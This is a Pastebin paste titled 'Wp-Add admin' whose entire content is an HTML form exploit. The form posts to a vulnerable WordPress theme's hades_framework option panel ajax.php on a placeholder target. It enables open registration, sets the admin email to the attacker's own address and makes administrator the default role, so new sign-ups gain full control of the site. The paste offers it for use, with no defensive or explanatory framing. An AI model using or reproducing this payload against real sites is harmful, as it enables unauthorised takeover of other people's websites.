Advertisement
BogorCyberSec

Wp-Add admin

Aug 18th, 2019
171
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 0.51 KB | None | 0 0
  1. <form action="http://target.com/wp-content/themes/nama tema/hades_framework/option_panel/ajax.php" method="POST">
  2. <input name="values[0][name]" value="users_can_register">
  3. <input name="values[0][value]" value="1">
  4. <input name="values[1][name]" value="admin_email">
  5. <input name="values[1][value]" value="email lo yg masi aktif">
  6. <input name="values[2][name]" value="default_role">
  7. <input name="values[2][value]" value="administrator">
  8. <input name="action" value="save">
  9. <input type="submit" value="Submit">
  10. </form>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement